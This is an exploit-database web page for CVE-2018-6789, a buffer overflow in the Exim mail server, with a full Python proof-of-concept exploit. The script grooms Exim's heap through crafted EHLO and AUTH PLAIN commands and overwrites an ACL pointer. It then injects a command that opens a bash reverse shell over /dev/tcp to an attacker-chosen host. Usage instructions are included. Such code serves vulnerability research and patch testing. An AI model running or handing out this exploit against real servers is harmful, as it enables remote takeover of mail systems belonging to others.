Advertisement






Exim base64d Buffer Overflow

CVE Category Price Severity
CVE-2018-6789 CWE-119 $1500 Critical
Author Risk Exploitation Type Date
Qualys Security Advisory High Remote 2021-06-06
CPE
cpe:cpe:/a:exim:exim
CVSS EPSS EPSSP
CVSS:7.8/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.234 0.81713

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060033

Below is a copy:

Exim base64d Buffer Overflow
#!/usr/bin/python
import sys
import time
import socket
import struct

s = None
f = None

def logo():
   print
   print "      CVE-2018-6789 Poc Exploit"
   print "@straight_blast ; [email protected]"
   print


def connect(host, port):
   global s
   global f
   s = socket.create_connection((host,port))
   f = s.makefile('rw', bufsize=0)

def p(v):
   return struct.pack("<Q", v)

def readuntil(delim='\n', debug = False):
   data = ''
   while not data.endswith(delim):
      data += f.read(1)
      if debug:
         print data
   return data

def write(data):
   f.write(data + "\n")

def ehlo(v):
   write("EHLO " + v)
   readuntil('HELP')

def unrec(v):
   write(v)
   readuntil('command')

def auth_plain(v,s = None):
   encode = v.encode('base64').replace('\n','').replace('=','')
   if s and len(s) > 0:
      encode = encode + s
   write("AUTH PLAIN " + encode)
   readuntil('data') 

def one_byte_overwrite():
   v = "C" * 8200
   encode = v.encode('base64').replace('\n','').replace('=','')
   encode = encode[:-1] + "PE"
   write("AUTH PLAIN " + encode)
   readuntil('data')

def exploit(remote_host, remote_port, local_host, local_port):

   connect(remote_host, remote_port)

   print "[0] connected to target -> " + remote_host + ":" + str(remote_port)

   time.sleep(0.5)
   
   ehlo("A" * 8000)  
  
   ehlo("B" * 16)

   print "[1] finished grooming heap with 0x6060 block space"

   unrec("\xff" * 2000)

   ehlo("D" * 8200)

   one_byte_overwrite()

   print "[2] triggerd 1 byte overwrite vulnerability to extend the chunk size from 0x2021 to 0x20f1"

   fake_header  = p(0) 
   fake_header += p(0x1f51)
   auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header)))

   print "[3] patched following store block with fake header so extended chunk can be freed"

   ehlo("F" * 16)

   print "[4] freed extended store block"

   unrec("\xff" * 2000) #filler against freed block
 
   unrec("\xff" * 2000) #filler against freed block

   fake_header  = p(0x4110)
   fake_header += p(0x1f50)   
   auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header)))

   print "[5] patched store block with fake header so extended chunk can be malloced"

   #acl_store_block_partial_address = "\x80\xa4\x6e"
   acl_store_block_partial_address = "\xe0\xc8\x6c"
   
   auth_plain("H" * 8200 + p(0x2021) + acl_store_block_partial_address, "X")
  
   print "[6] finished using extend chunk to overwrite the overlapping store block's next pointer to an acl store block address"

   ehlo("I" * 16)

   print "[7] triggered smtp_reset_3(); with EHLO"

   # 288 is for github build
   # 1000 is for debian build
   #acl_smtp_rcpt_offset = 288
   acl_smtp_rcpt_offset = 1000-16

   cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_address + "/" + str(local_port) + " 0>&1\""
   cmd_expansion_string = "${run{" + cmd + "}}\0"

   auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "\0" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string)))  

   print "[8] malloced acl store block and overwrite the content of acl_smtp_rcpt with shell expression"

   write("MAIL FROM:<[email protected]>") ; readuntil()

   write("RCPT TO:<[email protected]>")   

   print "[9] triggered RCPT TO which executes shell expression ... enjoy your shell!"

   print

if __name__ == '__main__':
   logo()
   if len(sys.argv) < 5:
      print "Usage: ./exploit <remote_address> <remote_port> <local_address> <local_port>\n"
      exit()
   remote_address = sys.argv[1]
   remote_port = int(sys.argv[2])
   local_address = sys.argv[3]
   local_port = int(sys.argv[4])
   #print remote_address, remote_port, local_address, local_port
   exploit(remote_address, remote_port, local_address, local_port)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum